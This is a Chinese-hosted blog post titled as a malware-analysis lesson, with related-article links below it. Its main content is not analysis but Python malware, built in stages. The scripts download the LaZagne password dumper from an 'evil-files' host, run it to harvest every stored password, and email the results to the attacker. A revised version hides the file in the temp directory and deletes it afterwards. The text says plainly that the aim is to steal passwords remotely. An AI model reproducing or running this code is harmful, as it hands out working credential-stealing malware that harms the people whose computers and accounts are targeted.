python hacking_Python Ethical Hacking - Malware Analysis(4)

最新推荐文章于 2021-12-24 12:13:41 发布
最新推荐文章于 2021-12-24 12:13:41 发布
阅读量97 收藏
点赞数
文章标签: python hacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36040903/article/details/113961752
版权

DOWNLOAD_FILE

Download files on a system.

Once packaged properly will work on all operating systems.

Simple but powerfull.

Can be used in many situations:

download _file + execute_command = download_and_execute

download_file + execute_and_report = download_execute_and_report

...etc

#!/usr/bin/env python

import requests

def download(url):

get_response = requests.get(url)

file_name = url.split("/")[-1]

with open(file_name, "wb") as out_file:

out_file.write(get_response.content)

download("https://cdn.spacetelescope.org/archives/images/screen/potw1739a.jpg")

471547cbe7a4b56ba4e095058ed42d24.png

DOWNLOAD_EXECUTE_AND_REPORT

Download files on a system.

Execute a command that uses this file.

Report results in our email.

Cross multi-Platform!!

Ex: remotely steal all stored passwords on a computer!

Using the LaZagne tool:https://github.com/AlessandroZ/LaZagne

lazagne.exe --help

7ab5f53885be3b1fa07236e71bfb97c1.png

Use the following command to find all the passwords in the current system.

lazagne.exe all

5596aa1095bde3f9ca77554e70d15a1a.png

Steal saved passwords remotely

#!/usr/bin/env python

import requests

import smtplib

import subprocess

def download(url):

get_response = requests.get(url)

file_name = url.split("/")[-1]

with open(file_name, "wb") as out_file:

out_file.write(get_response.content)

def send_mail(email, password, message):

server = smtplib.SMTP("smtp.gmail.com", 587)

server.starttls()

server.login(email, password)

server.sendmail(email, email, message)

server.quit()

download("http://10.0.0.43/evil-files/lazagne.exe")

result = subprocess.check_output("lazagne.exe all", shell=True)

print(result.decode())

send_mail("[email protected]", "1111111", result)

e46635f481cb188401f62fe42b430dbb.png

Optimize the Python Script - Interacting with the file system. The evil file will be downloaded in the temp directory and removed after executed.

#!/usr/bin/env python

import os

import smtplib

import subprocess

import requests

import tempfile

def download(url):

get_response = requests.get(url)

file_name = url.split("/")[-1]

with open(file_name, "wb") as out_file:

out_file.write(get_response.content)

def send_mail(email, password, message):

server = smtplib.SMTP("smtp.gmail.com", 587)

server.starttls()

server.login(email, password)

server.sendmail(email, email, message)

server.quit()

temp_directory = tempfile.gettempdir()

os.chdir(temp_directory)

download("http://10.0.0.43/evil-files/lazagne.exe")

result = subprocess.check_output("lazagne.exe all", shell=True)

print(result.decode())

send_mail("[email protected]", "1111111", result)

os.remove("lazagne.exe")

陈爸爸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Ethical_Hacking_Python
03-31
Ethical_Hacking_Python
Python-Ethical-Hacking-Scripts
03-28
Python道德黑客脚本 如果您不知道谁是我和我在做什么,请查看我的个人资料! IP检查器/拼写PYTHON脚本 我需要12分钟来创建它,希望您会使用它。 IP INT生成器PYTHON脚本 嗨,我被创建了这个脚本,我需要像25分钟一样...
Python Ethical Hacking - Malware Analysis(4)
weixin_30858241的博客
10-01 192
DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. Simple but powerfull. Can be used in many situations: download _file + execute_comm...
Python Ethical Hacking - Malware Analysis(2)
weixin_30858241的博客
09-28 137
Filtering Command Output using Regex #!/usr/bin/env python import smtplib import subprocess import re def send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail....
Python Ethical Hacking - Malware Analysis(1)
weixin_30858241的博客
09-28 152
WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Report. Download, Execute & Report. KEYLOGGER A program that records keys pressed o...
Python Ethical Hacking - Malware Analysis(3)
weixin_30858241的博客
10-01 127
Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess import re def send_mail(email, password, message): server = smtplib.SMTP("smtp....
Python Ethical Hacking - BeEF Framework(2)
weixin_30858241的博客
09-15 102
Basic BeEF commands: Login the BeEF Control Panel, and go to Commands page. Create Alert Dialog: Run Raw JavaScript Spyder Eye Redirect Browser ...
渗透测试和黑客攻击的区别_2020年道德黑客和渗透测试人员的十大操作系统列表...
weixin_26636643的博客
09-27 1649
渗透测试和黑客攻击的区别A hacker is a highly skilled computer operator who uses bugs and exploits to break into computer systems and networks. An ethical hacker, on the other hand, identifies vulnerabilities in c...
Ethical.Hacking.2021.10:BUILDING TROJANS
lm19770429的专栏
12-24 2143
回顾: metasploitframe 反射过程 msfvenom生成代码命令 Hiding an Implant in a Legitimate File
Best Free Hacking E-Books 2017 In PDF Format
weixin_33858336的博客
08-09 225
1、Best Free Hacking E-Books 2017 In PDF Format: 电子书籍下载地址后续我会更新在我的百度云资源上,需要的留言Black Belt Hacking & Complete Hacking BookHackers High School 13 Complete Hacking EbooksPenetration Testing With ...
网络安全职业_我如何开始网络安全职业
weixin_26636643的博客
08-13 743
网络安全职业Throughout my career as a cybersecurity professor, I often get questions about starting a career in cybersecurity. This question seems simple, but it is not easy to answer. If you are reading th...
Module_python_hacking_
09-29
【标题】"Module_python_hacking_" 暗示了这个压缩包可能包含了关于使用Python进行模块化黑客技术的内容。在IT行业中,"hack"这个词经常用于描述非传统或创新性的解决方案,而“Module”通常指的是代码组织的单元,...
「Linux」Oldschool_way_of_hacking_MicroDigital_ip-cameras - 应急响
11-29
「Linux」Oldschool_way_of_hacking_MicroDigital_ip-cameras - 应急响应 数据治理 网络安全 安全对抗 数据泄露 渗透测试
「安全测试」Hacking_You_Without_Password - 企业安全.zip
12-04
「安全测试」Hacking_You_Without_Password - 企业安全 工控安全 基础架构安全 红蓝对抗 自动化 攻防靶场
python小程序代码.docx
最新发布
07-19
python小程序代码
微调YOLO:定制化对象检测的秘诀
07-19
YOLO(You Only Look Once)是一种流行的实时对象检测系统,最初由 Joseph Redmon 等人在 2015 年提出。它的核心思想是将对象检测任务视为一个回归问题,直接从图像像素到边界框坐标和类别概率的映射。YOLO 以其快速和高效而闻名,特别适合需要实时处理的应用场景。 以下是 YOLO 的一些关键特点: 1. **单次检测**:YOLO 模型在单次前向传播中同时预测多个对象的边界框和类别概率,不需要多次扫描图像。 2. **速度快**:YOLO 非常快速,能够在视频帧率下进行实时检测,适合移动设备和嵌入式系统。 3. **端到端训练**:YOLO 模型可以从原始图像直接训练到最终的检测结果,无需复杂的后处理步骤。 4. **易于集成**:YOLO 模型结构简单,易于与其他视觉任务(如图像分割、关键点检测等)结合使用。 5. **多尺度预测**:YOLO 可以通过多尺度预测来检测不同大小的对象,提高了检测的准确性。 YOLO 已经发展出多个版本,包括 YOLOv1、YOLOv2(也称为 YOLO9000)、YOLOv3、YOLOv4 和 YOLOv5 等。
读书笔记:Java测试驱动开发 第7章 源码.zip
07-19
读书笔记:Java测试驱动开发 第7章 源码
【故障诊断】基于海洋捕食者优化算法MPA优化长短记忆网络LSTM实现故障诊断附matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
Python Web Hacking Essentials: 安全与黑客技术指南
"Python Web Hacking Essentials 无水印pdf" 《Python Web Hacking Essentials》是由Earnest Wish和Leo合作编写的一本关于网络安全和Python技术的书籍。这本书详细介绍了使用Python进行Web安全测试和黑客攻击防御的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值